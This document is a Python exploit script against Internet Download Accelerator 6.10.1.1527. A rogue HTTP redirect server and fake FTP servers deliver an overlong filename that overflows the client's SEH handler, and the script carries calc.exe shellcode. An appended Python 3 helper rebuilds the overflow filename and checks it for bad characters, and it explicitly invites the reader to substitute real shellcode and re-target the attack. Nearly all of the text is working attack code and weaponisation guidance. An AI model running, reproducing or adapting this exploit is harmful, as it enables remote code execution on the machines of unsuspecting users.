#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet Download Accelerator suffers from a BOF when an FTP download of a file with
# a long name fails.
# --------------
# To exploit this issue:
# 1- Run an HTTP server that redirects to the FTP file with the long name.
# 2- The FTP server answers the commands sent and then opens a data connection.
# 3- The script sends an empty file list on the data connection and closes it to trigger the BOF condition.
# 4- Happy new year :D.

import SocketServer
import threading

# IP to listen on. It is embedded in the PASV response, so 0.0.0.0 is not going to work.
ip = "192.168.1.100"
ipParts = ip.split(".")
# PASV port = 151 * 256 + 130 = 38786; the data server below must listen on that port.
PasvResp = "(" + ipParts[0] + "," + ipParts[1] + "," + ipParts[2] + "," + ipParts[3] + ",151,130)"

# Run Calc.exe
buf = ("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
       "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
       "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
       "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
       "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
       "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
       "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


class HTTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our HTTP server.
    This is just so we don't have to provide a suspicious FTP link with a long name.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        self.data = self.request.recv(1024).strip()
        print "[*] Received HTTP Request"
        print "[*] Sending Redirection To FTP"
        # SEH offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
        # Filename layout: 336 bytes of padding up to the SEH record, then nSEH
        # ("\xeb\x06" short jump over the handler address, plus two NOPs), then
        # SEH = 0x10011b53 written little-endian (pop/pop/ret in unzip32.dll),
        # then the shellcode padded to 1056 bytes.
        payload = "ftp://" + ip + "/" + 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
        self.request.sendall("HTTP/1.1 302 Found\r\n" + "Host: Server\r\nConnection: close\r\nLocation: " + payload + "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
        print "[*] Redirection Sent..."


class FTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP server.
    This will work normally and open a data connection with IDA.
    Each recv() below assumes the client sends one command at a time, in the
    order IDA was observed to send them.
    """

    def handle(self):
        # USER command
        self.request.sendall("220 Nasty FTP Server Ready\r\n")
        User = self.request.recv(1024).strip()
        print "[*] Received USER Command: " + User
        self.request.sendall("331 User name okay, need password\r\n")
        # PASS command
        Pass = self.request.recv(1024).strip()
        print "[*] Received PASS Command: " + Pass
        self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
        # SYST command
        Syst = self.request.recv(1024).strip()
        print "[*] Received SYST Command: " + Syst
        self.request.sendall("215 UNIX Type: L8\r\n")
        # TYPE command
        Type = self.request.recv(1024).strip()
        print "[*] Received TYPE Command: " + Type
        self.request.sendall("200 Type set to I\r\n")
        # REST command
        Rest = self.request.recv(1024).strip()
        print "[*] Received REST Command: " + Rest
        self.request.sendall("200 OK\r\n")
        # CWD command (carries the long filename, hence the larger buffer)
        Cwd = self.request.recv(2048).strip()
        print "[*] Received CWD Command: " + Cwd
        self.request.sendall("250 CWD Command successful\r\n")
        # PASV command: tell the client where the data connection is listening.
        Pasv = self.request.recv(1024).strip()
        print "[*] Received PASV Command: " + Pasv
        self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")
        # LIST command
        List = self.request.recv(1024).strip()
        print "[*] Received LIST Command: " + List
        self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")


class FTPDataHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP data connection.
    This will send a useless response and close the connection to trigger the error.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        print "[*] Received FTP-Data Request"
        print "[*] Sending Empty List"
        # An empty listing, then close: the failed download is what triggers the overflow.
        self.request.sendall("total 0\r\n\r\n")
        self.request.close()


if __name__ == "__main__":
    HOST, PORT = ip, 8000
    SocketServer.TCPServer.allow_reuse_address = True
    print "[*] Starting the HTTP Server."
    # Create the server, binding to our IP on port 8000
    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)
    # Run the HTTP server in a thread so we can continue and listen for FTP and FTP-Data.
    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
    HTTPThread.daemon = True
    HTTPThread.start()
    print "[*] Starting the FTP Server."
    # Running the FTP server.
    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)
    # Running the FTP server thread.
    FTPThread = threading.Thread(target=FTPServer.serve_forever)
    FTPThread.daemon = True
    FTPThread.start()
    print "[*] Opening the data connection."
    # Opening the FTP data connection - DON'T CHANGE THE PORT: 38786 is what PasvResp
    # (151,130) advertises to the client. The data port must use FTPDataHandler, not
    # FTPHandler, or the client never gets its listing and the connection never closes.
    FTPData = SocketServer.TCPServer((HOST, 38786), FTPDataHandler)
    # Running the FTP Data connection Thread.
    DataThread = threading.Thread(target=FTPData.serve_forever)
    DataThread.daemon = True
    DataThread.start()
    print "[*] Listening for FTP Data."
    # Making the main thread wait.
    print "[*] To exit the script please press any key at any time."
    raw_input()
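The two things most likely to go wrong when re-targeting this script are the filename layout (336 bytes to the SEH record, a short jump in nSEH, the 0x10011b53 pop/pop/ret address, shellcode padded to 1056 bytes) and the PASV tuple, which has to encode a concrete IP and the exact port the data server listens on. The following is an added Python 3 example, not part of the original exploit: it rebuilds the same filename from the script's offsets with a placeholder int3 shellcode, checks it for bytes that would cut the Location header or FTP command line short (an assumed set, not from the script), and round-trips the PASV response the way a client parses it.

```python
import re
import struct

# Offsets and addresses are the ones used by the exploit script above.
SEH_OFFSET = 336            # bytes of padding before the SEH record (nSEH)
PPR_ADDRESS = 0x10011b53    # pop/pop/ret in unzip32.dll, as used by the script
PAYLOAD_ROOM = 1056         # bytes the script fills after the SEH record
# Constructed placeholder: int3 breakpoints, same length as the script's calc.exe stub.
PLACEHOLDER_SHELLCODE = b"\xcc" * 97
# Assumption: bytes that terminate a C string, an HTTP header line or an FTP command line.
BAD_CHARS = b"\x00\r\n"


def pasv_response(ip, port):
    """Build the FTP '227 Entering Passive Mode' line for ip:port (RFC 959 h1,h2,h3,h4,p1,p2)."""
    parts = ip.split(".")
    try:
        octets = [int(x) for x in parts]
    except ValueError:
        octets = []
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("PASV needs a dotted-quad IPv4 address, not %r" % ip)
    if ip == "0.0.0.0":
        raise ValueError("0.0.0.0 is a bind address; the client cannot connect back to it")
    if not 0 <= port <= 0xffff:
        raise ValueError("port out of range")
    return "227 Entering Passive Mode (%d,%d,%d,%d,%d,%d)" % tuple(octets + [port >> 8, port & 0xff])


def parse_pasv(line):
    """Recover (ip, port) from a 227 line the way an FTP client does."""
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", line)
    if not m:
        raise ValueError("no PASV tuple in %r" % line)
    n = [int(x) for x in m.groups()]
    return ".".join(str(x) for x in n[:4]), n[4] * 256 + n[5]


def short_jmp(distance):
    """Encode a two-byte short JMP rel8 (EB xx) that skips `distance` bytes after itself."""
    if not -128 <= distance <= 127:
        raise ValueError("rel8 jump out of range")
    return b"\xeb" + struct.pack("<b", distance)


def find_bad_chars(data, bad=BAD_CHARS):
    """Offsets of every byte that would break the URL / FTP transport."""
    return [i for i, b in enumerate(data) if b in bad]


def build_seh_filename(shellcode, seh_offset=SEH_OFFSET, ppr=PPR_ADDRESS, room=PAYLOAD_ROOM):
    """
    Lay the overflowing filename out the way the script does:
        [padding][nSEH: jmp over the handler][SEH: pop/pop/ret][shellcode][filler]
    After the exception, pop/pop/ret returns into nSEH; the short jump there steps
    over its own two NOPs and the 4-byte handler address, landing on the shellcode.
    """
    if len(shellcode) > room:
        raise ValueError("shellcode does not fit in the %d bytes after the SEH record" % room)
    seh = struct.pack("<I", ppr)                    # handler address, little-endian
    nseh = short_jmp(2 + len(seh)) + b"\x90\x90"    # jump past 2 NOPs + 4-byte SEH
    filename = b"A" * seh_offset + nseh + seh + shellcode + b"B" * (room - len(shellcode))
    bad = find_bad_chars(filename)
    if bad:
        raise ValueError("bad characters at offsets %r" % bad)
    return filename


def seh_layout(filename, seh_offset=SEH_OFFSET):
    """What a debugger's SEH chain view should show once the record has been overwritten."""
    nseh = filename[seh_offset:seh_offset + 4]
    handler = struct.unpack("<I", filename[seh_offset + 4:seh_offset + 8])[0]
    return {"nseh": nseh, "handler": handler, "shellcode_offset": seh_offset + 8}


def redirect_response(ip, filename):
    """The 302 that hands the victim the ftp:// URL carrying the long filename, as wire bytes."""
    url = b"ftp://" + ip.encode("ascii") + b"/" + filename
    return b"HTTP/1.1 302 Found\r\nConnection: close\r\nLocation: " + url + b"\r\n\r\n"


if __name__ == "__main__":
    name = build_seh_filename(PLACEHOLDER_SHELLCODE)
    print("filename length:", len(name), "layout:", seh_layout(name))
    line = pasv_response("192.168.1.100", 38786)
    print(line, "->", parse_pasv(line))
    print(redirect_response("192.168.1.100", name)[:80])
```

Swap the placeholder for real shellcode and `build_seh_filename` will refuse it if it contains a NUL, CR or LF; extend `BAD_CHARS` once you have verified in a debugger which other bytes the client mangles on the way from the Location header to the stack.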